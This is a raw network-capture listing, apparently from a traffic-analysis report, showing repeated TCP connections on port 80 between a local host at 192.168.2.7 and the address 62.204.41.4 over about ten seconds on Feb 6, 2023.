                                                                      Feb 6, 2023 18:37:27.765784979 CET5005580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:27.766284943 CET5005580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:27.829035044 CET805005562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:27.832042933 CET805005562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:27.832165956 CET5005580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:27.951996088 CET5005580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:27.952852964 CET5005680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.014123917 CET805005662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.014231920 CET5005680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.014668941 CET805005562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.014709949 CET5005680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.014738083 CET5005580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.076056957 CET805005662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.082096100 CET805005662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.082174063 CET5005680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.199457884 CET5005680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.200114965 CET5005780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.260987997 CET805005662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.261145115 CET5005680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.261966944 CET805005762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.262100935 CET5005780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.262419939 CET5005780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.323826075 CET805005762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.327377081 CET805005762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.327495098 CET5005780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.433043003 CET5005780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.433689117 CET5005880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.493839025 CET805005862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.494551897 CET805005762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.494748116 CET5005780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.494785070 CET5005880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.499164104 CET5005880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.559528112 CET805005862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.563302040 CET805005862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.563481092 CET5005880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.673809052 CET5005880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.675221920 CET5005980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.734221935 CET805005862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.735838890 CET805005962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.735994101 CET5005880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.736028910 CET5005980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.737025976 CET5005980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.797633886 CET805005962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.802062035 CET805005962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.802270889 CET5005980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.929364920 CET5005980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.930145025 CET5006080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.990286112 CET805005962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.992342949 CET805006062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:28.992350101 CET5005980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.995245934 CET5006080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:28.997104883 CET5006080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.060527086 CET805006062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.066272020 CET805006062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.069065094 CET5006080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.183856964 CET5006080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.184629917 CET5006180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.245676994 CET805006162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.245816946 CET5006180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.246155977 CET5006180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.246328115 CET805006062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.246418953 CET5006080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.306963921 CET805006162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.310091972 CET805006162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.312036037 CET5006180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.422207117 CET5006180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.423887968 CET5006280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.483256102 CET805006162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.484467983 CET5006180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.484770060 CET805006262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.484879017 CET5006280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.485224962 CET5006280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.545943975 CET805006262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.549381971 CET805006262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.549541950 CET5006280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.723119020 CET5006280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.724071026 CET5006380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.784167051 CET805006262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.786007881 CET805006362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.786128998 CET5006280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.786144018 CET5006380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.786602974 CET5006380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.848054886 CET805006362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.851991892 CET805006362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:29.852108002 CET5006380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.990089893 CET5006380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:29.991046906 CET5006480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.052139997 CET805006362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.053338051 CET805006462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.053406954 CET5006380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.053500891 CET5006480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.054049969 CET5006480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.116381884 CET805006462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.121550083 CET805006462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.124227047 CET5006480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.230732918 CET5006480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.234410048 CET5006580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.293137074 CET805006462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.295866966 CET805006562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.296063900 CET5006480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.296140909 CET5006580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.338042974 CET5006580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.399529934 CET805006562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.403852940 CET805006562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.403989077 CET5006580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.923196077 CET5006580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.923926115 CET5006680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.983517885 CET805006662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.984045982 CET5006680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.984589100 CET805006562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:30.984780073 CET5006580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:30.995908022 CET5006680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.055510044 CET805006662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:31.059571981 CET805006662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:31.059688091 CET5006680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.214994907 CET5006680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.215643883 CET5006780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.274642944 CET805006662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:31.274748087 CET5006680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.276036024 CET805006762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:31.276177883 CET5006780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.325633049 CET5006780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.386295080 CET805006762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:31.389426947 CET805006762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:31.389590025 CET5006780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.977792978 CET5006780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:31.978636980 CET5006880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.038548946 CET805006762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.038717031 CET5006780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.040014029 CET805006862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.040131092 CET5006880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.325881958 CET5006880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.387587070 CET805006862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.394088030 CET805006862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.394222975 CET5006880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.498296976 CET5006880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.500072956 CET5006980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.559880972 CET805006862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.560010910 CET5006880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.561440945 CET805006962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.561568975 CET5006980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.561893940 CET5006980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.623476982 CET805006962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.625941038 CET805006962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.626007080 CET5006980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.733890057 CET5006980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.734663010 CET5007080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.795205116 CET805006962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.795383930 CET5006980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.796214104 CET805007062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.796336889 CET5007080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.801482916 CET5007080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.863181114 CET805007062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.867610931 CET805007062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:32.867753983 CET5007080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.980539083 CET5007080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:32.981734991 CET5007180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.041318893 CET805007162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.041438103 CET5007180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.042257071 CET805007062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.042377949 CET5007080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.042572021 CET5007180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.102197886 CET805007162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.107430935 CET805007162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.107628107 CET5007180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.215109110 CET5007180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.216110945 CET5007280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.275222063 CET805007162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.275435925 CET5007180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.277878046 CET805007262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.278017998 CET5007280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.278393030 CET5007280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.340325117 CET805007262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.342987061 CET805007262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.343132019 CET5007280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.469125986 CET5007280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.470015049 CET5007380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.531130075 CET805007262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.532355070 CET5007280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.532618046 CET805007362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.536413908 CET5007380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.536848068 CET5007380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.599390030 CET805007362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.602340937 CET805007362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.604435921 CET5007380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.715429068 CET5007380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.721470118 CET5007480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.778263092 CET805007362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.780635118 CET5007380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.782289982 CET805007462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.782496929 CET5007480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.782820940 CET5007480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.843414068 CET805007462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.846342087 CET805007462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:33.846564054 CET5007480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.950201035 CET5007480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:33.951370955 CET5007580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.011364937 CET805007462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.011686087 CET805007562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.011941910 CET5007480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.012001991 CET5007580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.012824059 CET5007580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.073396921 CET805007562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.078227997 CET805007562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.080476999 CET5007580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.184241056 CET5007580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.184847116 CET5007680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.244595051 CET805007662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.244802952 CET805007562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.244869947 CET5007680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.244957924 CET5007580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.245536089 CET5007680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.305182934 CET805007662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.309325933 CET805007662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.313549995 CET5007680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.419295073 CET5007680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.420180082 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.479893923 CET805007662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.480053902 CET5007680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.482418060 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.482569933 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.482978106 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.545505047 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.547892094 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.548054934 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.653062105 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.654195070 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.716048956 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.716094971 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.716154099 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.716418028 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.718344927 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.782244921 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.786504030 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.786760092 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.902757883 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.902864933 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.963414907 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.963659048 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.964653969 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.965140104 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.965163946 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.025444031 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.029045105 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.029226065 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.136936903 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.139740944 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.197443008 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.197545052 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.199531078 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.199666977 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.199980974 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.260658026 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.266577959 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.266668081 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.381650925 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.382325888 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.442049980 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.442192078 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.444793940 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.444911957 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.445260048 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.506886959 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.510221958 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.510334969 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.627574921 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.629290104 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.689654112 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.689779043 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.691828966 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.691946030 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.692289114 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.757100105 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.761848927 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.761987925 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.877840042 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.883477926 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.940691948 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.940783024 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.944376945 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.944468021 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.944830894 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.005314112 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.011137009 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.011254072 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.121320963 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.122000933 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.182857990 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.182899952 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.183013916 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.183109045 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.184166908 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.245105982 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.250062943 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.250200987 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.361450911 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.363001108 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.422687054 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.422866106 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.423676014 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.423837900 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.424990892 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.487132072 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.505920887 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.518474102 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.626951933 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.627763033 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.700342894 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.700376034 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.700869083 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.701277018 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.704777002 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.765599012 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.768732071 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.768939018 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.872703075 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.874378920 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.934978008 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.935182095 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.936898947 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.937115908 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.937901020 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.998565912 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.001657009 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.003259897 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.105986118 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.107618093 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.166873932 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.167185068 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.169327974 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.170741081 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.171595097 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.233428955 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.239892006 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.240106106 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.358699083 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.360677958 CET5008980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.420510054 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.422446966 CET805008962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.422687054 CET5008980192.168.2.762.204.41.4
